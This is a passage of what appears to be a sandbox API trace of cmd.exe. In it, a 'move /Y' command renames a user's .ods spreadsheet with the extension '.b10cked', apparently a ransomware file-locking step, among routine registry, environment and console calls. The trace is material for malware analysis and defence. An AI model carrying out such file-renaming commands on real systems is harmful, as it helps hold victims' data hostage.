Type=0x20000)) returned 0x1c [0140.232] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efc3c, dwLength=0x1c | out: lpBuffer=0x2efc3c*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.233] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efc3c, dwLength=0x1c | out: lpBuffer=0x2efc3c*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.233] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efc3c, dwLength=0x1c | out: lpBuffer=0x2efc3c*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.233] GetConsoleOutputCP () returned 0x1b5 [0140.233] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.233] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.233] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.233] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.233] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.233] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.233] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.233] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.233] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.233] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.234] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.234] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.234] GetEnvironmentStringsW () returned 0x100198* [0140.234] FreeEnvironmentStringsW (penv=0x100198) returned 1 [0140.234] GetEnvironmentStringsW () returned 0x100198* [0140.234] FreeEnvironmentStringsW (penv=0x100198) returned 1 [0140.234] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eebdc | out: phkResult=0x2eebdc*=0x40) returned 0x0 [0140.234] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eebe4, lpData=0x2eebe8, lpcbData=0x2eebe0*=0x1000 | out: lpType=0x2eebe4*=0x0, lpData=0x2eebe8*=0xc0, lpcbData=0x2eebe0*=0x1000) returned 0x2 [0140.234] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eebe4, lpData=0x2eebe8, lpcbData=0x2eebe0*=0x1000 | out: lpType=0x2eebe4*=0x4, lpData=0x2eebe8*=0x1, lpcbData=0x2eebe0*=0x4) returned 0x0 [0140.234] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eebe4, lpData=0x2eebe8, lpcbData=0x2eebe0*=0x1000 | out: lpType=0x2eebe4*=0x0, lpData=0x2eebe8*=0x1, lpcbData=0x2eebe0*=0x1000) returned 0x2 [0140.235] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eebe4, lpData=0x2eebe8, lpcbData=0x2eebe0*=0x1000 | out: lpType=0x2eebe4*=0x4, lpData=0x2eebe8*=0x0, lpcbData=0x2eebe0*=0x4) returned 0x0 [0140.235] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eebe4, lpData=0x2eebe8, lpcbData=0x2eebe0*=0x1000 | out: lpType=0x2eebe4*=0x4, lpData=0x2eebe8*=0x40, lpcbData=0x2eebe0*=0x4) returned 0x0 [0140.235] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eebe4, lpData=0x2eebe8, lpcbData=0x2eebe0*=0x1000 | out: lpType=0x2eebe4*=0x4, lpData=0x2eebe8*=0x40, lpcbData=0x2eebe0*=0x4) returned 0x0 [0140.235] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eebe4, lpData=0x2eebe8, lpcbData=0x2eebe0*=0x1000 | out: lpType=0x2eebe4*=0x0, lpData=0x2eebe8*=0x40, lpcbData=0x2eebe0*=0x1000) returned 0x2 [0140.235] RegCloseKey (hKey=0x40) returned 0x0 [0140.235] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eebdc | out: phkResult=0x2eebdc*=0x40) returned 0x0 [0140.235] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eebe4, lpData=0x2eebe8, lpcbData=0x2eebe0*=0x1000 | out: lpType=0x2eebe4*=0x0, lpData=0x2eebe8*=0x40, lpcbData=0x2eebe0*=0x1000) returned 0x2 [0140.235] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eebe4, lpData=0x2eebe8, lpcbData=0x2eebe0*=0x1000 | out: lpType=0x2eebe4*=0x4, lpData=0x2eebe8*=0x1, lpcbData=0x2eebe0*=0x4) returned 0x0 [0140.235] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eebe4, lpData=0x2eebe8, lpcbData=0x2eebe0*=0x1000 | out: lpType=0x2eebe4*=0x0, lpData=0x2eebe8*=0x1, lpcbData=0x2eebe0*=0x1000) returned 0x2 [0140.235] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eebe4, lpData=0x2eebe8, lpcbData=0x2eebe0*=0x1000 | out: lpType=0x2eebe4*=0x4, lpData=0x2eebe8*=0x0, lpcbData=0x2eebe0*=0x4) returned 0x0 [0140.235] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eebe4, lpData=0x2eebe8, lpcbData=0x2eebe0*=0x1000 | out: lpType=0x2eebe4*=0x4, lpData=0x2eebe8*=0x9, lpcbData=0x2eebe0*=0x4) returned 0x0 [0140.235] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eebe4, lpData=0x2eebe8, lpcbData=0x2eebe0*=0x1000 | out: lpType=0x2eebe4*=0x4, lpData=0x2eebe8*=0x9, lpcbData=0x2eebe0*=0x4) returned 0x0 [0140.235] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eebe4, lpData=0x2eebe8, lpcbData=0x2eebe0*=0x1000 | out: lpType=0x2eebe4*=0x0, lpData=0x2eebe8*=0x9, lpcbData=0x2eebe0*=0x1000) returned 0x2 [0140.235] RegCloseKey (hKey=0x40) returned 0x0 [0140.235] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636e [0140.235] srand (_Seed=0x5b88636e) [0140.235] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFQBH~1.ODS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods.b10cked\"" [0140.235] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFQBH~1.ODS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods.b10cked\"" [0140.235] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.236] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1018f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.236] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.236] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.236] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.236] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.236] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.236] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.236] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.236] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.236] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.236] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.236] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.236] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.236] GetEnvironmentStringsW () returned 0x1022e8* [0140.237] FreeEnvironmentStringsW (penv=0x1022e8) returned 1 [0140.237] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.237] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.237] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.237] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.237] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.237] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.237] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.237] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.237] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.237] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.237] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef9a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.237] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef9a8, lpFilePart=0x2ef9a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef9a4*="Desktop") returned 0x18 [0140.237] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.237] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef724 | out: lpFindFileData=0x2ef724) returned 0x100028 [0140.237] FindClose (in: hFindFile=0x100028 | out: hFindFile=0x100028) returned 1 [0140.238] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef724 | out: lpFindFileData=0x2ef724) returned 0x100028 [0140.238] FindClose (in: hFindFile=0x100028 | out: hFindFile=0x100028) returned 1 [0140.238] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef724 | out: lpFindFileData=0x2ef724) returned 0x100028 [0140.238] FindClose (in: hFindFile=0x100028 | out: hFindFile=0x100028) returned 1 [0140.238] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.238] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.238] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.238] GetEnvironmentStringsW () returned 0x102b08* [0140.238] FreeEnvironmentStringsW (penv=0x102b08) returned 1 [0140.238] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.239] GetConsoleOutputCP () returned 0x1b5 [0140.239] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.239] GetUserDefaultLCID () returned 0x409 [0140.239] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.239] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efae8, cchData=128 | out: lpLCData="0") returned 2 [0140.239] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efae8, cchData=128 | out: lpLCData="0") returned 2 [0140.239] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efae8, cchData=128 | out: lpLCData="1") returned 2 [0140.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.240] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.240] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.240] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.241] GetConsoleTitleW (in: lpConsoleTitle=0xf08f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.241] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.241] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.241] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.241] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.242] _wcsicmp (_String1="move", _String2=")") returned 68 [0140.242] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0140.242] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0140.242] _wcsicmp (_String1="IF", _String2="move") returned -4 [0140.242] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0140.242] _wcsicmp (_String1="REM", _String2="move") returned 5 [0140.242] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0140.246] GetConsoleTitleW (in: lpConsoleTitle=0x2ef7e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.246] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0140.246] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0140.246] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0140.246] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0140.246] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0140.246] _wcsicmp (_String1="move", _String2="CD") returned 10 [0140.246] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0140.246] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0140.246] _wcsicmp (_String1="move", _String2="REN") returned -5 [0140.246] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0140.246] _wcsicmp (_String1="move", _String2="SET") returned -6 [0140.246] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0140.246] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0140.246] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0140.246] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0140.246] _wcsicmp (_String1="move", _String2="MD") returned 11 [0140.246] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0140.246] _wcsicmp (_String1="move", _String2="RD") returned -5 [0140.246] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0140.246] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0140.246] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0140.247] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0140.247] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0140.247] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0140.247] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0140.247] _wcsicmp (_String1="move", _String2="VER") returned -9 [0140.247] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0140.247] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0140.247] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0140.247] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0140.247] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0140.247] _wcsicmp (_String1="move", _String2="START") returned -6 [0140.247] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0140.247] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0140.247] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0140.249] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.249] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.249] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef59c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef594, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef594*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0140.250] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0140.250] _wcsicmp (_String1="IJFQBH~1.ODS", _String2=".") returned 59 [0140.250] _wcsicmp (_String1="IJFQBH~1.ODS", _String2="..") returned 59 [0140.251] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFQBH~1.ODS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\ijfqbh~1.ods")) returned 0x20 [0140.251] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x101e68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.251] SetErrorMode (uMode=0x0) returned 0x0 [0140.251] SetErrorMode (uMode=0x1) returned 0x0 [0140.251] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFQBH~1.ODS", nBufferLength=0x104, lpBuffer=0x2eef24, lpFilePart=0x2eef0c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFQBH~1.ODS", lpFilePart=0x2eef0c*="IJFQBH~1.ODS") returned 0x2d [0140.251] SetErrorMode (uMode=0x0) returned 0x1 [0140.251] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew")) returned 0x12 [0140.251] _wcsicmp (_String1="IJFQBH~1.ODS", _String2=".") returned 59 [0140.251] _wcsicmp (_String1="IJFQBH~1.ODS", _String2="..") returned 59 [0140.251] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFQBH~1.ODS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\ijfqbh~1.ods")) returned 0x20 [0140.251] SetErrorMode (uMode=0x0) returned 0x0 [0140.251] SetErrorMode (uMode=0x1) returned 0x0 [0140.251] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFQBH~1.ODS", nBufferLength=0x104, lpBuffer=0x2ef3a0, lpFilePart=0x2ef138 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFQBH~1.ODS", lpFilePart=0x2ef138*="IJFQBH~1.ODS") returned 0x2d [0140.252] SetErrorMode (uMode=0x0) returned 0x1 [0140.252] SetErrorMode (uMode=0x0) returned 0x0 [0140.252] SetErrorMode (uMode=0x1) returned 0x0 [0140.252] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods.b10cked", nBufferLength=0x104, lpBuffer=0x2ef5a8, lpFilePart=0x2ef138 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods.b10cked", lpFilePart=0x2ef138*="IJFqBHm_BK63v.ods.b10cked") returned 0x3a [0140.252] SetErrorMode (uMode=0x0) returned 0x1 [0140.252] SetLastError (dwErrCode=0x0) [0140.252] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\ijfqbhm_bk63v.ods.b10cked")) returned 0xffffffff [0140.252] GetLastError () returned 0x2 [0140.252] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFQBH~1.ODS", fInfoLevelId=0x1, lpFindFileData=0x2eeab4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeab4) returned 0xf0eb0 [0140.252] FindNextFileW (in: hFindFile=0xf0eb0, lpFindFileData=0x2eeab4 | out: lpFindFileData=0x2eeab4) returned 0 [0140.253] GetLastError () returned 0x12 [0140.253] FindClose (in: hFindFile=0xf0eb0 | out: hFindFile=0xf0eb0) returned 1 [0140.869] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFQBH~1.ODS", fInfoLevelId=0x1, lpFindFileData=0x101c08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x101c08) returned 0xf0eb0 [0140.869] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods.b10cked", nBufferLength=0x104, lpBuffer=0x2eed4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods.b10cked", lpFilePart=0x0) returned 0x3a [0140.869] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods", nBufferLength=0x104, lpBuffer=0x2eed4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods", lpFilePart=0x0) returned 0x32 [0140.869] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\ijfqbhm_bk63v.ods")) returned 0x20 [0140.869] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\ijfqbhm_bk63v.ods"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\ijfqbhm_bk63v.ods.b10cked"), dwFlags=0x3) returned 1 [0140.870] FindClose (in: hFindFile=0xf0eb0 | out: hFindFile=0xf0eb0) returned 1 [0140.870] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2eed00 | out: _Buffer=" 1") returned 9 [0140.870] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.870] GetFileType (hFile=0x7) returned 0x2 [0140.870] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.870] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eec8c | out: lpMode=0x2eec8c) returned 1 [0140.870] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.870] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2eecc0 | out: lpConsoleScreenBufferInfo=0x2eecc0) returned 1 [0140.870] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 